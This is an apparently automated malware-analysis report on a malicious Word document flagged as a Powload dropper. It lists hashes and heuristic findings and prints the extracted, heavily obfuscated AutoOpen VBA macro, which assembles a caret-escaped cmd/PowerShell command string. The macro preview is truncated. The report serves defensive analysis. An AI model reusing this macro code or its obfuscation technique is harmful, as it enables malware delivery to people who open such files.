Office (OLE) malware analysis — malicious · 33eddca30855de5a

MALICIOUS

Office (OLE)

90.0 KB Created: 2018-08-29 11:02:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 5a524415a95bb6114d693fafc89361d8 SHA-1: 121f35d0cc62336fe2754d4b01f3d95eff117315 SHA-256: 33eddca30855de5a4411ed03f1b361ca31ced4de5dc4c817fd3220dd02092e8a

202 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Powload-6665714-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Powload-6665714-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9935 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9935 bytes
SHA-256: `bf6cd1fe399f23e8b7d6c07e28f6e8736a96e75d004efb1516b29c1c2ad0d5fc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "dGmbmtWbCXbuEh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WnQTVBapd" Function qXqTRCO() On _ Error _ Resume _ Next Hour ZmuCNO * OzPRzz Hour VubwwB / wLTNmL lJGwb = "m" + "d /V^:/" + "C" + Chr(2 + 4 + 0 + 2 + 26) + "^se" + "^t" + " P" + "^Y==^" + "=^A^A^g" + "^A^A^I" + "^" + "AA" Hour 39547 * JusmEi Hour dGlLn * XjVpGk ICAZzGGQGZu = "CA^gA^A" + "^" + "I^A^" + "AC^" + "A^g^" + "AAIA^" + "AC" Hour 1388 * qYDsT Hour 91958 / 67649 / 22272 / ldDDnf Hour opjjAc * FlHorN / 96727 * aWsaH Hour 68154 / IBzijE Hour wkNic * 56001 Hour 15851 / ZunXzL vtquoLdjhZ = "^AgA^" + "A^IA^" + "AC^A" + "^" + "g" Hour 69859 / bswrj Hour 36799 * BRHVU Hour bLOiIh / tBfKTG Hour 73951 / 16334 Hour 34774 / 35788 jMqdTiC = "A" + "^A^I^" + "A^" + "AC" + "A^g^A^A" + "^" Hour 80987 * dWBkSF / rtwFWZ / aidsM Hour 97833 * vEKmAi Hour 52928 * OcPAm zrNLmHjilt = "I^A^0^H" + "^A9^Bw" + "^e^Ag" + "^GAjBA" + "d" + "^" + "AEGA" + "^jBQ^fA" + "s^D^Ar" + "BQ^" + "YA^" Hour 98125 / idiAt Hour 33561 * lwUQwU FhcYRb = "U^G" + "^A^" + "y^B^g" + "^Y^" + "As^DA" + "6B^w" + "^aAw" + "^" + "G^AkA^A" + "^IA0^" + "GA^lB^" + "A^d^Ak" + "EA^tAQZ" qXqTRCO = lJGwb + ICAZzGGQGZu + vtquoLdjhZ + jMqdTiC + zrNLmHjilt + FhcYRb Hour 33485 * bMTaFo Hour kIXqfE / QIZUR Hour 18080 / tKGwi End Function Function aTdlZEP() On _ Error _ Resume _ Next Hour Aovwh * NjCnaj * LGwKw * 40335 Hour 18597 * npoutG Hour 27974 / trLmfc BiDtDa = "^A^s^" + "G^Av" + "^Bg^" + "d" + "^A^4^G" + "A^J^Bw^" + "O^AkC^A" + "6" + "B^w^aA" Hour asPfa * dNciq Hour 37079 * iznpO Hour zDSjh / CtPwW Hour lstRuE / uEldUU * 26480 / TXQkvk ArVcYSzl = "wG^A^k" + "^A^A^IA" + "wC" + "^ABB" + "^" Hour WvJiS * HlKGu / uFSFoM * mtObUE Hour 3019 * OWzmHP / 1302 / aRSYw lLvPd = "A" + "^aA^" + "U^EAk^" + "A^A^K" + "^AUGAs" + "^BQ^aAY" + "EA^" + "kB" + "Q" + "^Y^" + "A^8GA" + "^s^B" + "gb" Hour 29868 / DqDREM Hour 6055 / EsBlr / DirED * bztdin Hour pAiza / KKjDK * TpawU / WnJHZ Hour 8369 / iXtTof hskGMivkJM = "AcHAv" + "^" + "BARA^4C" + "A6B" + "^" + "A" + "V^AE^H" Hour 52795 / 81972 * 19683 / ZZWmoZ Hour 28787 / mEJWGQ Hour 34760 * WEVaLw / 86904 * YPFoRM ZDUjwBNH = "Ak" + "A^w^" + "eAkH" + "AyB^" + "A" + "^dAsH^" + "A^p" + "^A" + "^wcAo" + "^HAh" Hour UOmkZc * dGYhhl kSapioPpwOJ = "B^AJA^" + "AC" + "^" + "Au^B" + "^QaA" Hour GnSdlf / kFQYwj * 49359 * ahLZXb Hour 39991 * 90563 Hour 90797 / NwJvuB / TXtMq / DsawA Hour JrVrL * PGKsCz Hour 47461 / cjMqaw / EEjWjB * VuAnK Hour BGzRLJ * UOofUV IucipYRph = "AC^A^" + "B^" + "B" + "Aa^A^UE" + "^A^kA^" + "AK^A" + "^g^" + "G^A" + "jB" + "Q^Y" Hour wPTkzK / isTwZo Hour 59490 / LOoomu Hour rKfYDF / 76793 * IZctu * OhfDc Hour 71478 * dTKOR / ZoJua * WndWr fiMOibNk = "AU" + "^G^AyB" + "^w" + "^" + "bAYG^A" + "7Aw" Hour 65890 * pzaDI / hwmwJ * NEhXjV Hour 39120 * NrGSIC FBVwpD = "J^A^U^" + "G^" + "A^4^BQ" + "Z^A^4C" + "An^A" + "^wK^A^g" + "FAP" + "BAU^" Hour rKcbt * JiqHS Hour vDCdU * EpKjss * hXbAk / POwDN Hour GTlAKZ * jBFhjj FzqGkZQF = "A" + "^QCAr" + "Aw" + "^JAw" + "F^An" + "^Aw^K" Hour tDFtn * OioADJ Hour cRvpRp / SJZBIZ / zIQhtd * 53167 Hour 79508 * Aowsjk * 7058 / 19356 Hour 36087 / VjRuRA * wWnam * Twkvts OhIIlckji = "A^MG" + "^A^" + "pB^Ab" + "^A" + "I^G" + "A^1B^A" + "cA^" + "oD" + "^A" + "^2" Hour 2274 * JzNinX Hour fUTzDa * datjrf OmXjTc = "^Bg^b^A" + "U" + "^GA" + "k" + "AQP^Ao^" + "H" + "^" + "Ar" Hour fjWPWL / EuLIsY Hour CYTuP * JNGKAA / 69197 / JwsSiC vmVjoFiF = "^B^A^b" + "AQ" + "CA^7A^w" + "^" + "J^" + "A^Y^D" + "A" + "4^A^gN" + "^AcC^A" aTdlZEP = BiDtDa + ArVcYSzl + lLvPd + hskGMivkJM + ZDUjwBNH + kSapioPpwOJ + IucipYRph + fiMOibNk + FBVwpD + FzqGkZQF + OhIIlckji + OmXjTc + vmVjoFiF Hour MQZuhT / ... (truncated)

SHA-256: bf6cd1fe399f23e8b7d6c07e28f6e8736a96e75d004efb1516b29c1c2ad0d5fc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "dGmbmtWbCXbuEh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WnQTVBapd"
Function qXqTRCO()

On _
Error _
Resume _
Next
Hour ZmuCNO * OzPRzz
   Hour VubwwB / wLTNmL
lJGwb = "m" + "d /V^:/" + "C" + Chr(2 + 4 + 0 + 2 + 26) + "^se" + "^t" + " P" + "^Y==^" + "=^A^A^g" + "^A^A^I" + "^" + "AA"
Hour 39547 * JusmEi
   Hour dGlLn * XjVpGk
ICAZzGGQGZu = "CA^gA^A" + "^" + "I^A^" + "AC^" + "A^g^" + "AAIA^" + "AC"
Hour 1388 * qYDsT
   Hour 91958 / 67649 / 22272 / ldDDnf
   Hour opjjAc * FlHorN / 96727 * aWsaH
   Hour 68154 / IBzijE
   Hour wkNic * 56001
   Hour 15851 / ZunXzL
vtquoLdjhZ = "^AgA^" + "A^IA^" + "AC^A" + "^" + "g"
Hour 69859 / bswrj
   Hour 36799 * BRHVU
   Hour bLOiIh / tBfKTG
   Hour 73951 / 16334
   Hour 34774 / 35788
jMqdTiC = "A" + "^A^I^" + "A^" + "AC" + "A^g^A^A" + "^"
Hour 80987 * dWBkSF / rtwFWZ / aidsM
   Hour 97833 * vEKmAi
   Hour 52928 * OcPAm
zrNLmHjilt = "I^A^0^H" + "^A9^Bw" + "^e^Ag" + "^GAjBA" + "d" + "^" + "AEGA" + "^jBQ^fA" + "s^D^Ar" + "BQ^" + "YA^"
Hour 98125 / idiAt
   Hour 33561 * lwUQwU
FhcYRb = "U^G" + "^A^" + "y^B^g" + "^Y^" + "As^DA" + "6B^w" + "^aAw" + "^" + "G^AkA^A" + "^IA0^" + "GA^lB^" + "A^d^Ak" + "EA^tAQZ"
qXqTRCO = lJGwb + ICAZzGGQGZu + vtquoLdjhZ + jMqdTiC + zrNLmHjilt + FhcYRb
   Hour 33485 * bMTaFo
   Hour kIXqfE / QIZUR
   Hour 18080 / tKGwi
End Function
Function aTdlZEP()

On _
Error _
Resume _
Next
Hour Aovwh * NjCnaj * LGwKw * 40335
   Hour 18597 * npoutG
   Hour 27974 / trLmfc
BiDtDa = "^A^s^" + "G^Av" + "^Bg^" + "d" + "^A^4^G" + "A^J^Bw^" + "O^AkC^A" + "6" + "B^w^aA"
Hour asPfa * dNciq
   Hour 37079 * iznpO
   Hour zDSjh / CtPwW
   Hour lstRuE / uEldUU * 26480 / TXQkvk
ArVcYSzl = "wG^A^k" + "^A^A^IA" + "wC" + "^ABB" + "^"
Hour WvJiS * HlKGu / uFSFoM * mtObUE
   Hour 3019 * OWzmHP / 1302 / aRSYw
lLvPd = "A" + "^aA^" + "U^EAk^" + "A^A^K" + "^AUGAs" + "^BQ^aAY" + "EA^" + "kB" + "Q" + "^Y^" + "A^8GA" + "^s^B" + "gb"
Hour 29868 / DqDREM
   Hour 6055 / EsBlr / DirED * bztdin
   Hour pAiza / KKjDK * TpawU / WnJHZ
   Hour 8369 / iXtTof
hskGMivkJM = "AcHAv" + "^" + "BARA^4C" + "A6B" + "^" + "A" + "V^AE^H"
Hour 52795 / 81972 * 19683 / ZZWmoZ
   Hour 28787 / mEJWGQ
   Hour 34760 * WEVaLw / 86904 * YPFoRM
ZDUjwBNH = "Ak" + "A^w^" + "eAkH" + "AyB^" + "A" + "^dAsH^" + "A^p" + "^A" + "^wcAo" + "^HAh"
Hour UOmkZc * dGYhhl
kSapioPpwOJ = "B^AJA^" + "AC" + "^" + "Au^B" + "^QaA"
Hour GnSdlf / kFQYwj * 49359 * ahLZXb
   Hour 39991 * 90563
   Hour 90797 / NwJvuB / TXtMq / DsawA
   Hour JrVrL * PGKsCz
   Hour 47461 / cjMqaw / EEjWjB * VuAnK
   Hour BGzRLJ * UOofUV
IucipYRph = "AC^A^" + "B^" + "B" + "Aa^A^UE" + "^A^kA^" + "AK^A" + "^g^" + "G^A" + "jB" + "Q^Y"
Hour wPTkzK / isTwZo
   Hour 59490 / LOoomu
   Hour rKfYDF / 76793 * IZctu * OhfDc
   Hour 71478 * dTKOR / ZoJua * WndWr
fiMOibNk = "AU" + "^G^AyB" + "^w" + "^" + "bAYG^A" + "7Aw"
Hour 65890 * pzaDI / hwmwJ * NEhXjV
   Hour 39120 * NrGSIC
FBVwpD = "J^A^U^" + "G^" + "A^4^BQ" + "Z^A^4C" + "An^A" + "^wK^A^g" + "FAP" + "BAU^"
Hour rKcbt * JiqHS
   Hour vDCdU * EpKjss * hXbAk / POwDN
   Hour GTlAKZ * jBFhjj
FzqGkZQF = "A" + "^QCAr" + "Aw" + "^JAw" + "F^An" + "^Aw^K"
Hour tDFtn * OioADJ
   Hour cRvpRp / SJZBIZ / zIQhtd * 53167
   Hour 79508 * Aowsjk * 7058 / 19356
   Hour 36087 / VjRuRA * wWnam * Twkvts
OhIIlckji = "A^MG" + "^A^" + "pB^Ab" + "^A" + "I^G" + "A^1B^A" + "cA^" + "oD" + "^A" + "^2"
Hour 2274 * JzNinX
   Hour fUTzDa * datjrf
OmXjTc = "^Bg^b^A" + "U" + "^GA" + "k" + "AQP^Ao^" + "H" + "^" + "Ar"
Hour fjWPWL / EuLIsY
   Hour CYTuP * JNGKAA / 69197 / JwsSiC
vmVjoFiF = "^B^A^b" + "AQ" + "CA^7A^w" + "^" + "J^" + "A^Y^D" + "A" + "4^A^gN" + "^AcC^A"
aTdlZEP = BiDtDa + ArVcYSzl + lLvPd + hskGMivkJM + ZDUjwBNH + kSapioPpwOJ + IucipYRph + fiMOibNk + FBVwpD + FzqGkZQF + OhIIlckji + OmXjTc + vmVjoFiF
   Hour MQZuhT /
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.